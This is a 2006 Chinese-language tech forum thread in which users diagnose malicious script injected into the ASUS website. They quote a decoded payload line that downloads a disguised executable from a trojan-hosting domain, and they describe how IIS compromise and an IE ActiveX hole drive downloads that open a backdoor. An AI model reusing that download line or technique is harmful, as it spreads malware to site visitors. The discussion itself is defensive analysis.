PCDVD數位科技討論區

PCDVD數位科技討論區 (https://www.pcdvd.com.tw/index.php)
-   系統組件 (https://www.pcdvd.com.tw/forumdisplay.php?f=19)
-   -   ASUS網站被加料了? (https://www.pcdvd.com.tw/showthread.php?t=679020)

冬之炎陽 2006-12-16 04:23 PM

www.yyc8.com 站台似乎是專門用來放木馬的
由 MS IIS 架成的網站 :D

darksnow 2006-12-16 05:00 PM

引用:
作者冬之炎陽
那堆編碼過的文字解碼之後就是下面的程式碼 :p:p:p


代碼:
dl="http://www.yyc8.com/script/src/rss3.css"


...


這個檔案看起來是個css檔,不過其實是個執行檔。

starless 2006-12-16 05:46 PM

這一個禮拜有去Asus逛逛,不過用的是Firefox,所以沒事,Kaspersky也沒有動作。

SpeedRossi 2006-12-16 09:30 PM

剛剛要找ASUS一款已停產的筆電資料
怎麼找都找不到
網站速度又慢
不管是FF還是IE都慢到我快發瘋了
ASUS到底把停產的產品資料庫放在哪啊

chanp 2006-12-16 09:53 PM

引用:
作者SpeedRossi
剛剛要找ASUS一款已停產的筆電資料
怎麼找都找不到
網站速度又慢
不管是FF還是IE都慢到我快發瘋了
ASUS到底把停產的產品資料庫放在哪啊

+1
我也找不到停產的主板資料.. :jolin:

bob0123 2006-12-16 10:32 PM

舊的產品,要直接進入 FTP,去找 pdf 檔案來看。

ftp://ftp.asus.com.tw/pub/ASUS/


主機板,
ftp://ftp.asus.com.tw/pub/ASUS/mb/

筆記型電腦,
ftp://ftp.asus.com.tw/pub/ASUS/nb/

JING FENG 2006-12-16 11:39 PM

自己的網站首頁,也已經連兩天.
出現這樣的情形,不過連的網頁不同. :flash:
第一天發現後,馬上把網頁重新更換.
隔天的晚上11點多,又被修改了.
目前正在密切注意當中..

starless 2006-12-17 08:28 AM

引用:
作者JING FENG
自己的網站首頁,也已經連兩天.
出現這樣的情形,不過連的網頁不同. :flash:
第一天發現後,馬上把網頁重新更換.
隔天的晚上11點多,又被修改了.
目前正在密切注意當中..


連虎大的網站都有中....
所以可能是漏洞攻擊加木馬植入?! :eek:

kyougi 2006-12-17 11:37 AM

網站不要用IIS開就比較難中標了吧

kyougi 2006-12-17 11:45 AM

這毒跟之前資策會的一樣
基本上就是IIS Server被入侵(IIS漏洞)
植入了會使用ADO Activex物件(ie才會中)的漏洞
讓你的IE自動下載了一個exe並執行
然後就開始開後門了
防毒然軟偵測不到是因為那段Script被編碼過
雖然是很笨的編碼方式(懂Script的人就知)
但因為IE不會把解碼過的Script讓防毒軟體知道
所以防毒軟體也無法事前得知


所有的時間均為GMT +8。 現在的時間是11:55 PM.

vBulletin Version 3.0.1
powered_by_vbulletin 2025。